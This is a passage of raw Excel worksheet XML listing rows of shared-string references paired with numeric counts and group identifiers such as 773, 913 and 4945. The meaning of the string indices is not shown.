    <row r="10625" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10625" t="s">
        <v>16228</v>
      </c>
      <c r="B10625" t="s">
        <v>16215</v>
      </c>
      <c r="C10625">
        <v>85</v>
      </c>
      <c r="D10625">
        <v>2379</v>
      </c>
    </row>
    <row r="10626" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10626" t="s">
        <v>16231</v>
      </c>
      <c r="B10626" t="s">
        <v>16216</v>
      </c>
      <c r="C10626">
        <v>55</v>
      </c>
      <c r="D10626">
        <v>2379</v>
      </c>
    </row>
    <row r="10627" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10627" t="s">
        <v>16228</v>
      </c>
      <c r="B10627" t="s">
        <v>16217</v>
      </c>
      <c r="C10627">
        <v>0</v>
      </c>
      <c r="D10627">
        <v>2379</v>
      </c>
    </row>
    <row r="10628" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10628" t="s">
        <v>16231</v>
      </c>
      <c r="B10628" t="s">
        <v>16218</v>
      </c>
      <c r="C10628">
        <v>0</v>
      </c>
      <c r="D10628">
        <v>2379</v>
      </c>
    </row>
    <row r="10629" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10629" t="s">
        <v>16229</v>
      </c>
      <c r="B10629" t="s">
        <v>16219</v>
      </c>
      <c r="C10629">
        <v>5</v>
      </c>
      <c r="D10629">
        <v>2379</v>
      </c>
    </row>
    <row r="10630" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10630" t="s">
        <v>16230</v>
      </c>
      <c r="B10630" t="s">
        <v>16220</v>
      </c>
      <c r="C10630">
        <v>0</v>
      </c>
      <c r="D10630">
        <v>2379</v>
      </c>
    </row>
    <row r="10631" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10631" t="s">
        <v>16229</v>
      </c>
      <c r="B10631" t="s">
        <v>16221</v>
      </c>
      <c r="C10631">
        <v>0</v>
      </c>
      <c r="D10631">
        <v>2379</v>
      </c>
    </row>
    <row r="10632" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10632" t="s">
        <v>16230</v>
      </c>
      <c r="B10632" t="s">
        <v>16222</v>
      </c>
      <c r="C10632">
        <v>0</v>
      </c>
      <c r="D10632">
        <v>2379</v>
      </c>
    </row>
    <row r="10633" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10633" t="s">
        <v>16223</v>
      </c>
      <c r="B10633" t="s">
        <v>16223</v>
      </c>
      <c r="C10633">
        <v>5</v>
      </c>
      <c r="D10633">
        <v>2379</v>
      </c>
    </row>
    <row r="10634" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10634" t="s">
        <v>16224</v>
      </c>
      <c r="B10634" t="s">
        <v>16224</v>
      </c>
      <c r="C10634">
        <v>1</v>
      </c>
      <c r="D10634">
        <v>2379</v>
      </c>
    </row>
    <row r="10635" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10635" t="s">
        <v>16228</v>
      </c>
      <c r="B10635" t="s">
        <v>16211</v>
      </c>
      <c r="C10635">
        <v>0</v>
      </c>
      <c r="D10635">
        <v>773</v>
      </c>
    </row>
    <row r="10636" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10636" t="s">
        <v>16231</v>
      </c>
      <c r="B10636" t="s">
        <v>16212</v>
      </c>
      <c r="C10636">
        <v>0</v>
      </c>
      <c r="D10636">
        <v>773</v>
      </c>
    </row>
    <row r="10637" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10637" t="s">
        <v>16228</v>
      </c>
      <c r="B10637" t="s">
        <v>16213</v>
      </c>
      <c r="C10637">
        <v>0</v>
      </c>
      <c r="D10637">
        <v>773</v>
      </c>
    </row>
    <row r="10638" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10638" t="s">
        <v>16231</v>
      </c>
      <c r="B10638" t="s">
        <v>16214</v>
      </c>
      <c r="C10638">
        <v>0</v>
      </c>
      <c r="D10638">
        <v>773</v>
      </c>
    </row>
    <row r="10639" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10639" t="s">
        <v>16228</v>
      </c>
      <c r="B10639" t="s">
        <v>16215</v>
      </c>
      <c r="C10639">
        <v>2</v>
      </c>
      <c r="D10639">
        <v>773</v>
      </c>
    </row>
    <row r="10640" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10640" t="s">
        <v>16231</v>
      </c>
      <c r="B10640" t="s">
        <v>16216</v>
      </c>
      <c r="C10640">
        <v>3</v>
      </c>
      <c r="D10640">
        <v>773</v>
      </c>
    </row>
    <row r="10641" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10641" t="s">
        <v>16228</v>
      </c>
      <c r="B10641" t="s">
        <v>16217</v>
      </c>
      <c r="C10641">
        <v>10</v>
      </c>
      <c r="D10641">
        <v>773</v>
      </c>
    </row>
    <row r="10642" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10642" t="s">
        <v>16231</v>
      </c>
      <c r="B10642" t="s">
        <v>16218</v>
      </c>
      <c r="C10642">
        <v>0</v>
      </c>
      <c r="D10642">
        <v>773</v>
      </c>
    </row>
    <row r="10643" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10643" t="s">
        <v>16229</v>
      </c>
      <c r="B10643" t="s">
        <v>16219</v>
      </c>
      <c r="C10643">
        <v>0</v>
      </c>
      <c r="D10643">
        <v>773</v>
      </c>
    </row>
    <row r="10644" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10644" t="s">
        <v>16230</v>
      </c>
      <c r="B10644" t="s">
        <v>16220</v>
      </c>
      <c r="C10644">
        <v>0</v>
      </c>
      <c r="D10644">
        <v>773</v>
      </c>
    </row>
    <row r="10645" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10645" t="s">
        <v>16229</v>
      </c>
      <c r="B10645" t="s">
        <v>16221</v>
      </c>
      <c r="C10645">
        <v>0</v>
      </c>
      <c r="D10645">
        <v>773</v>
      </c>
    </row>
    <row r="10646" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10646" t="s">
        <v>16230</v>
      </c>
      <c r="B10646" t="s">
        <v>16222</v>
      </c>
      <c r="C10646">
        <v>0</v>
      </c>
      <c r="D10646">
        <v>773</v>
      </c>
    </row>
    <row r="10647" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10647" t="s">
        <v>16223</v>
      </c>
      <c r="B10647" t="s">
        <v>16223</v>
      </c>
      <c r="C10647">
        <v>23</v>
      </c>
      <c r="D10647">
        <v>773</v>
      </c>
    </row>
    <row r="10648" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10648" t="s">
        <v>16224</v>
      </c>
      <c r="B10648" t="s">
        <v>16224</v>
      </c>
      <c r="C10648">
        <v>1</v>
      </c>
      <c r="D10648">
        <v>773</v>
      </c>
    </row>
    <row r="10649" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10649" t="s">
        <v>16228</v>
      </c>
      <c r="B10649" t="s">
        <v>16215</v>
      </c>
      <c r="C10649">
        <v>15</v>
      </c>
      <c r="D10649">
        <v>901</v>
      </c>
    </row>
    <row r="10650" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10650" t="s">
        <v>16231</v>
      </c>
      <c r="B10650" t="s">
        <v>16216</v>
      </c>
      <c r="C10650">
        <v>5</v>
      </c>
      <c r="D10650">
        <v>901</v>
      </c>
    </row>
    <row r="10651" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10651" t="s">
        <v>16228</v>
      </c>
      <c r="B10651" t="s">
        <v>16217</v>
      </c>
      <c r="C10651">
        <v>16</v>
      </c>
      <c r="D10651">
        <v>901</v>
      </c>
    </row>
    <row r="10652" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10652" t="s">
        <v>16229</v>
      </c>
      <c r="B10652" t="s">
        <v>16219</v>
      </c>
      <c r="C10652">
        <v>1</v>
      </c>
      <c r="D10652">
        <v>901</v>
      </c>
    </row>
    <row r="10653" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10653" t="s">
        <v>16230</v>
      </c>
      <c r="B10653" t="s">
        <v>16220</v>
      </c>
      <c r="C10653">
        <v>1</v>
      </c>
      <c r="D10653">
        <v>901</v>
      </c>
    </row>
    <row r="10654" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10654" t="s">
        <v>16229</v>
      </c>
      <c r="B10654" t="s">
        <v>16221</v>
      </c>
      <c r="C10654">
        <v>31</v>
      </c>
      <c r="D10654">
        <v>901</v>
      </c>
    </row>
    <row r="10655" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10655" t="s">
        <v>16230</v>
      </c>
      <c r="B10655" t="s">
        <v>16222</v>
      </c>
      <c r="C10655">
        <v>70</v>
      </c>
      <c r="D10655">
        <v>901</v>
      </c>
    </row>
    <row r="10656" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10656" t="s">
        <v>16228</v>
      </c>
      <c r="B10656" t="s">
        <v>16211</v>
      </c>
      <c r="C10656">
        <v>0</v>
      </c>
      <c r="D10656">
        <v>913</v>
      </c>
    </row>
    <row r="10657" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10657" t="s">
        <v>16231</v>
      </c>
      <c r="B10657" t="s">
        <v>16212</v>
      </c>
      <c r="C10657">
        <v>0</v>
      </c>
      <c r="D10657">
        <v>913</v>
      </c>
    </row>
    <row r="10658" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10658" t="s">
        <v>16228</v>
      </c>
      <c r="B10658" t="s">
        <v>16213</v>
      </c>
      <c r="C10658">
        <v>0</v>
      </c>
      <c r="D10658">
        <v>913</v>
      </c>
    </row>
    <row r="10659" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10659" t="s">
        <v>16231</v>
      </c>
      <c r="B10659" t="s">
        <v>16214</v>
      </c>
      <c r="C10659">
        <v>0</v>
      </c>
      <c r="D10659">
        <v>913</v>
      </c>
    </row>
    <row r="10660" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10660" t="s">
        <v>16228</v>
      </c>
      <c r="B10660" t="s">
        <v>16215</v>
      </c>
      <c r="C10660">
        <v>0</v>
      </c>
      <c r="D10660">
        <v>913</v>
      </c>
    </row>
    <row r="10661" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10661" t="s">
        <v>16231</v>
      </c>
      <c r="B10661" t="s">
        <v>16216</v>
      </c>
      <c r="C10661">
        <v>0</v>
      </c>
      <c r="D10661">
        <v>913</v>
      </c>
    </row>
    <row r="10662" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10662" t="s">
        <v>16228</v>
      </c>
      <c r="B10662" t="s">
        <v>16217</v>
      </c>
      <c r="C10662">
        <v>0</v>
      </c>
      <c r="D10662">
        <v>913</v>
      </c>
    </row>
    <row r="10663" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10663" t="s">
        <v>16231</v>
      </c>
      <c r="B10663" t="s">
        <v>16218</v>
      </c>
      <c r="C10663">
        <v>0</v>
      </c>
      <c r="D10663">
        <v>913</v>
      </c>
    </row>
    <row r="10664" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10664" t="s">
        <v>16229</v>
      </c>
      <c r="B10664" t="s">
        <v>16219</v>
      </c>
      <c r="C10664">
        <v>0</v>
      </c>
      <c r="D10664">
        <v>913</v>
      </c>
    </row>
    <row r="10665" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10665" t="s">
        <v>16230</v>
      </c>
      <c r="B10665" t="s">
        <v>16220</v>
      </c>
      <c r="C10665">
        <v>0</v>
      </c>
      <c r="D10665">
        <v>913</v>
      </c>
    </row>
    <row r="10666" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10666" t="s">
        <v>16229</v>
      </c>
      <c r="B10666" t="s">
        <v>16221</v>
      </c>
      <c r="C10666">
        <v>0</v>
      </c>
      <c r="D10666">
        <v>913</v>
      </c>
    </row>
    <row r="10667" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10667" t="s">
        <v>16230</v>
      </c>
      <c r="B10667" t="s">
        <v>16222</v>
      </c>
      <c r="C10667">
        <v>0</v>
      </c>
      <c r="D10667">
        <v>913</v>
      </c>
    </row>
    <row r="10668" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10668" t="s">
        <v>16223</v>
      </c>
      <c r="B10668" t="s">
        <v>16223</v>
      </c>
      <c r="C10668">
        <v>26</v>
      </c>
      <c r="D10668">
        <v>913</v>
      </c>
    </row>
    <row r="10669" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10669" t="s">
        <v>16224</v>
      </c>
      <c r="B10669" t="s">
        <v>16224</v>
      </c>
      <c r="C10669">
        <v>3</v>
      </c>
      <c r="D10669">
        <v>913</v>
      </c>
    </row>
    <row r="10670" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10670" t="s">
        <v>16228</v>
      </c>
      <c r="B10670" t="s">
        <v>16211</v>
      </c>
      <c r="C10670">
        <v>0</v>
      </c>
      <c r="D10670">
        <v>4944</v>
      </c>
    </row>
    <row r="10671" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10671" t="s">
        <v>16231</v>
      </c>
      <c r="B10671" t="s">
        <v>16212</v>
      </c>
      <c r="C10671">
        <v>0</v>
      </c>
      <c r="D10671">
        <v>4944</v>
      </c>
    </row>
    <row r="10672" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10672" t="s">
        <v>16228</v>
      </c>
      <c r="B10672" t="s">
        <v>16213</v>
      </c>
      <c r="C10672">
        <v>0</v>
      </c>
      <c r="D10672">
        <v>4944</v>
      </c>
    </row>
    <row r="10673" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10673" t="s">
        <v>16231</v>
      </c>
      <c r="B10673" t="s">
        <v>16214</v>
      </c>
      <c r="C10673">
        <v>0</v>
      </c>
      <c r="D10673">
        <v>4944</v>
      </c>
    </row>
    <row r="10674" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10674" t="s">
        <v>16228</v>
      </c>
      <c r="B10674" t="s">
        <v>16215</v>
      </c>
      <c r="C10674">
        <v>1</v>
      </c>
      <c r="D10674">
        <v>4944</v>
      </c>
    </row>
    <row r="10675" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10675" t="s">
        <v>16231</v>
      </c>
      <c r="B10675" t="s">
        <v>16216</v>
      </c>
      <c r="C10675">
        <v>0</v>
      </c>
      <c r="D10675">
        <v>4944</v>
      </c>
    </row>
    <row r="10676" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10676" t="s">
        <v>16228</v>
      </c>
      <c r="B10676" t="s">
        <v>16217</v>
      </c>
      <c r="C10676">
        <v>11</v>
      </c>
      <c r="D10676">
        <v>4944</v>
      </c>
    </row>
    <row r="10677" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10677" t="s">
        <v>16231</v>
      </c>
      <c r="B10677" t="s">
        <v>16218</v>
      </c>
      <c r="C10677">
        <v>0</v>
      </c>
      <c r="D10677">
        <v>4944</v>
      </c>
    </row>
    <row r="10678" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10678" t="s">
        <v>16229</v>
      </c>
      <c r="B10678" t="s">
        <v>16219</v>
      </c>
      <c r="C10678">
        <v>0</v>
      </c>
      <c r="D10678">
        <v>4944</v>
      </c>
    </row>
    <row r="10679" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10679" t="s">
        <v>16230</v>
      </c>
      <c r="B10679" t="s">
        <v>16220</v>
      </c>
      <c r="C10679">
        <v>0</v>
      </c>
      <c r="D10679">
        <v>4944</v>
      </c>
    </row>
    <row r="10680" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10680" t="s">
        <v>16229</v>
      </c>
      <c r="B10680" t="s">
        <v>16221</v>
      </c>
      <c r="C10680">
        <v>0</v>
      </c>
      <c r="D10680">
        <v>4944</v>
      </c>
    </row>
    <row r="10681" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10681" t="s">
        <v>16230</v>
      </c>
      <c r="B10681" t="s">
        <v>16222</v>
      </c>
      <c r="C10681">
        <v>10</v>
      </c>
      <c r="D10681">
        <v>4944</v>
      </c>
    </row>
    <row r="10682" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10682" t="s">
        <v>16223</v>
      </c>
      <c r="B10682" t="s">
        <v>16223</v>
      </c>
      <c r="C10682">
        <v>25</v>
      </c>
      <c r="D10682">
        <v>4944</v>
      </c>
    </row>
    <row r="10683" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10683" t="s">
        <v>16224</v>
      </c>
      <c r="B10683" t="s">
        <v>16224</v>
      </c>
      <c r="C10683">
        <v>1</v>
      </c>
      <c r="D10683">
        <v>4944</v>
      </c>
    </row>
    <row r="10684" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10684" t="s">
        <v>16228</v>
      </c>
      <c r="B10684" t="s">
        <v>16211</v>
      </c>
      <c r="C10684">
        <v>0</v>
      </c>
      <c r="D10684">
        <v>4945</v>
      </c>
    </row>
    <row r="10685" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10685" t="s">
        <v>16231</v>
      </c>
      <c r="B10685" t="s">
        <v>16212</v>
      </c>
      <c r="C10685">
        <v>0</v>
      </c>
      <c r="D10685">
        <v>4945</v>
      </c>
    </row>
    <row r="10686" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10686" t="s">
        <v>16228</v>
      </c>
      <c r="B10686" t="s">
        <v>16213</v>
      </c>
      <c r="C10686">
        <v>0</v>
      </c>
      <c r="D10686">
        <v>4945</v>
      </c>
    </row>
    <row r="10687" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10687" t="s">
        <v>16231</v>
      </c>
      <c r="B10687" t="s">
        <v>16214</v>
      </c>
      <c r="C10687">
        <v>0</v>
      </c>
      <c r="D10687">
        <v>4945</v>
      </c>
    </row>
    <row r="10688" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10688" t="s">
        <v>16228</v>
      </c>
      <c r="B10688" t="s">
        <v>16215</v>
      </c>
      <c r="C10688">
        <v>19</v>
      </c>
      <c r="D10688">
        <v>4945</v>
      </c>
    </row>
    <row r="10689" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10689" t="s">
        <v>16231</v>
      </c>
      <c r="B10689" t="s">
        <v>16216</v>
      </c>
      <c r="C10689">
        <v>19</v>
      </c>
      <c r="D10689">
        <v>4945</v>
      </c>
    </row>
    <row r="10690" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10690" t="s">
        <v>16228</v>
      </c>
      <c r="B10690" t="s">
        <v>16217</v>
      </c>
      <c r="C10690">
        <v>1</v>
      </c>
      <c r="D10690">
        <v>4945</v>
      </c>
    </row>
    <row r="10691" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10691" t="s">
        <v>16231</v>
      </c>
      <c r="B10691" t="s">
        <v>16218</v>
      </c>
      <c r="C10691">
        <v>5</v>
      </c>
      <c r="D10691">
        <v>4945</v>
      </c>
    </row>
    <row r="10692" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10692" t="s">
        <v>16229</v>
      </c>
      <c r="B10692" t="s">
        <v>16219</v>
      </c>
      <c r="C10692">
        <v>43</v>
      </c>
      <c r="D10692">
        <v>4945</v>
      </c>
    </row>
    <row r="10693" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10693" t="s">
        <v>16230</v>
      </c>
      <c r="B10693" t="s">
        <v>16220</v>
      </c>
      <c r="C10693">
        <v>49</v>
      </c>
      <c r="D10693">
        <v>4945</v>
      </c>
    </row>
    <row r="10694" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10694" t="s">
        <v>16229</v>
      </c>
      <c r="B10694" t="s">
        <v>16221</v>
      </c>
      <c r="C10694">
        <v>0</v>
      </c>
      <c r="D10694">
        <v>4945</v>
      </c>
    </row>
    <row r="10695" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10695" t="s">
        <v>16230</v>
      </c>
      <c r="B10695" t="s">
        <v>16222</v>
      </c>
      <c r="C10695">
        <v>6</v>
      </c>
      <c r="D10695">
        <v>4945</v>
      </c>
    </row>
    <row r="10696" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10696" t="s">
        <v>16223</v>
      </c>
      <c r="B10696" t="s">
        <v>16223</v>
      </c>
      <c r="C10696">
        <v>25</v>
      </c>
      <c r="D10696">
        <v>4945</v>
      </c>
    </row>
    <row r="10697" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10697" t="s">
        <v>16224</v>
      </c>
      <c r="B10697" t="s">
        <v>16224</v>
      </c>
      <c r="C10697">
        <v>0</v>
      </c>
      <c r="D10697">
        <v>4945</v>
      </c>
    </row>
    <row r="10698" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10698" t="s">
        <v>16228</v>
      </c>
      <c r="B10698" t="s">
        <v>16211</v>
      </c>
      <c r="C10698">
        <v>0</v>
      </c>
      <c r="D10698">
        <v>905</v>
      </c>
    </row>
    <row r="10699" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10699" t="s">
        <v>16231</v>
      </c>
      <c r="B10699" t="s">
        <v>16212</v>
      </c>
      <c r="C10699">
        <v>0</v>
      </c>
      <c r="D10699">
        <v>905</v>
      </c>
    </row>
    <row r="10700" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10700" t="s">
        <v>16228</v>
      </c>
      <c r="B10700" t="s">
        <v>16213</v>
      </c>
      <c r="C10700">
        <v>0</v>
      </c>
      <c r="D10700">
        <v>905</v>
      </c>
    </row>
    <row r="10701" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10701" t="s">
        <v>16231</v>
      </c>
      <c r="B10701" t="s">
        <v>16214</v>
      </c>
      <c r="C10701">
        <v>0</v>
      </c>
      <c r="D10701">
        <v>905</v>
      </c>
    </row>
    <row r="10702" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10702" t="s">
        <v>16228</v>
      </c>
      <c r="B10702" t="s">
        <v>16215</v>
      </c>
      <c r="C10702">
        <v>1</v>
      </c>
      <c r="D10702">
        <v>905</v>
      </c>
    </row>
    <row r="10703" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10703" t="s">
        <v>16231</v>
      </c>
      <c r="B10703" t="s">
        <v>16216</v>
      </c>
      <c r="C10703">
        <v>1</v>
      </c>
      <c r="D10703">
        <v>905</v>
      </c>
    </row>
    <row r="10704" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10704" t="s">
        <v>16228</v>
      </c>
      <c r="B10704" t="s">
        <v>16217</v>
      </c>
      <c r="C10704">
        <v>16</v>
      </c>
      <c r="D10704">
        <v>905</v>
      </c>
    </row>
    <row r="10705" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10705" t="s">
        <v>16231</v>
      </c>
      <c r="B10705" t="s">
        <v>16218</v>
      </c>
      <c r="C10705">
        <v>19</v>
      </c>
      <c r="D10705">
        <v>905</v>
      </c>
    </row>
    <row r="10706" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10706" t="s">
        <v>16229</v>
      </c>
      <c r="B10706" t="s">
        <v>16219</v>
      </c>
      <c r="C10706">
        <v>0</v>
      </c>
      <c r="D10706">
        <v>905</v>
      </c>
    </row>
    <row r="10707" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10707" t="s">
        <v>16230</v>
      </c>
      <c r="B10707" t="s">
        <v>16220</v>
      </c>
      <c r="C10707">
        <v>0</v>
      </c>
      <c r="D10707">
        <v>905</v>
      </c>
    </row>
    <row r="10708" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10708" t="s">
        <v>16229</v>
      </c>
      <c r="B10708" t="s">
        <v>16221</v>
      </c>
      <c r="C10708">
        <v>1</v>
      </c>
      <c r="D10708">
        <v>905</v>
      </c>
    </row>
    <row r="10709" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10709" t="s">
        <v>16230</v>
      </c>
      <c r="B10709" t="s">
        <v>16222</v>
      </c>
      <c r="C10709">
        <v>1</v>
      </c>
      <c r="D10709">
        <v>905</v>
      </c>
    </row>
    <row r="10710" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10710" t="s">
        <v>16223</v>
      </c>
      <c r="B10710" t="s">
        <v>16223</v>
      </c>
      <c r="C10710">
        <v>20</v>
      </c>
      <c r="D10710">
        <v>905</v>
      </c>
    </row>
    <row r="10711" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10711" t="s">
        <v>16224</v>
      </c>
      <c r="B10711" t="s">
        <v>16224</v>
      </c>
      <c r="C10711">
        <v>1</v>
      </c>
      <c r="D10711">
        <v>905</v>
      </c>
    </row>
    <row r="10712" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10712" t="s">
        <v>16228</v>
      </c>
      <c r="B10712" t="s">
        <v>16217</v>
      </c>
      <c r="C10712">
        <v>0</v>
      </c>
      <c r="D10712">
        <v>905</v>
      </c>
    </row>
    <row r="10713" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10713" t="s">
        <v>16231</v>
      </c>
      <c r="B10713" t="s">
        <v>16218</v>
      </c>
      <c r="C10713">
        <v>0</v>
      </c>
      <c r="D10713">
        <v>905</v>
      </c>
    </row>
    <row r="10714" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10714" t="s">
        <v>16229</v>
      </c>
      <c r="B10714" t="s">
        <v>16221</v>
      </c>
      <c r="C10714">
        <v>17</v>
      </c>
      <c r="D10714">
        <v>905</v>
      </c>
    </row>
    <row r="10715" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10715" t="s">
        <v>16230</v>
      </c>
      <c r="B10715" t="s">
        <v>16222</v>
      </c>
      <c r="C10715">
        <v>20</v>
      </c>
      <c r="D10715">
        <v>905</v>
      </c>
    </row>
    <row r="10716" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10716" t="s">
        <v>16228</v>
      </c>
      <c r="B10716" t="s">
        <v>16215</v>
      </c>
      <c r="C10716">
        <v>9</v>
      </c>
      <c r="D10716">
        <v>913</v>
      </c>
    </row>
    <row r="10717" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10717" t="s">
        <v>16231</v>
      </c>
      <c r="B10717" t="s">
        <v>16216</v>
      </c>
      <c r="C10717">
        <v>12</v>
      </c>
      <c r="D10717">
        <v>913</v>
      </c>
    </row>
    <row r="10718" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10718" t="s">
        <v>16228</v>
      </c>
      <c r="B10718" t="s">
        <v>16217</v>
      </c>
      <c r="C10718">
        <v>48</v>
      </c>
      <c r="D10718">
        <v>913</v>
      </c>
    </row>
    <row r="10719" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10719" t="s">
        <v>16231</v>
      </c>
      <c r="B10719" t="s">
        <v>16218</v>
      </c>
      <c r="C10719">
        <v>2</v>
      </c>
      <c r="D10719">
        <v>913</v>
      </c>
    </row>
    <row r="10720" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10720" t="s">
        <v>16228</v>
      </c>
      <c r="B10720" t="s">
        <v>16211</v>
      </c>
      <c r="C10720">
        <v>3</v>
      </c>
      <c r="D10720">
        <v>1098</v>
      </c>
    </row>
    <row r="10721" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10721" t="s">
        <v>16231</v>
      </c>
      <c r="B10721" t="s">
        <v>16212</v>
      </c>
      <c r="C10721">
        <v>0</v>
      </c>
      <c r="D10721">
        <v>1098</v>
      </c>
    </row>
    <row r="10722" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10722" t="s">
        <v>16228</v>
      </c>
      <c r="B10722" t="s">
        <v>16213</v>
      </c>
      <c r="C10722">
        <v>3</v>
      </c>
      <c r="D10722">
        <v>1098</v>
      </c>
    </row>
    <row r="10723" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10723" t="s">
        <v>16231</v>
      </c>
      <c r="B10723" t="s">
        <v>16214</v>
      </c>
      <c r="C10723">
        <v>0</v>
      </c>
      <c r="D10723">
        <v>1098</v>
      </c>
    </row>
    <row r="10724" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10724" t="s">
        <v>16228</v>
      </c>
      <c r="B10724" t="s">
        <v>16215</v>
      </c>
      <c r="C10724">
        <v>0</v>
      </c>
      <c r="D10724">
        <v>1098</v>
      </c>
    </row>
    <row r="10725" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10725" t="s">
        <v>16231</v>
      </c>
      <c r="B10725" t="s">
        <v>16216</v>
      </c>
      <c r="C10725">
        <v>0</v>
      </c>
      <c r="D10725">
        <v>1098</v>
      </c>
    </row>
    <row r="10726" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10726" t="s">
        <v>16228</v>
      </c>
      <c r="B10726" t="s">
        <v>16217</v>
      </c>
      <c r="C10726">
        <v>0</v>
      </c>
      <c r="D10726">
        <v>1098</v>
      </c>
    </row>
    <row r="10727" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10727" t="s">
        <v>16231</v>
      </c>
      <c r="B10727" t="s">
        <v>16218</v>
      </c>
      <c r="C10727">
        <v>0</v>
      </c>
      <c r="D10727">
        <v>1098</v>
      </c>
    </row>
    <row r="10728" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10728" t="s">
        <v>16229</v>
      </c>
      <c r="B10728" t="s">
        <v>16219</v>
      </c>
      <c r="C10728">
        <v>5</v>
      </c>
      <c r="D10728">
        <v>1098</v>
      </c>
    </row>
    <row r="10729" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A10729" t="s">
        <v>16230</v>
      </c>
      <c r="B10729" t="s">
        <v>16220</v>
      </c>
      <c r="C10729">
        <v>6</v>
      </c>
      <c r="D10729">
        <v>1098</v>
      </c>
    </row>
    <row r="10730" spans="1:4" x14ac:dyDescent="0.2">
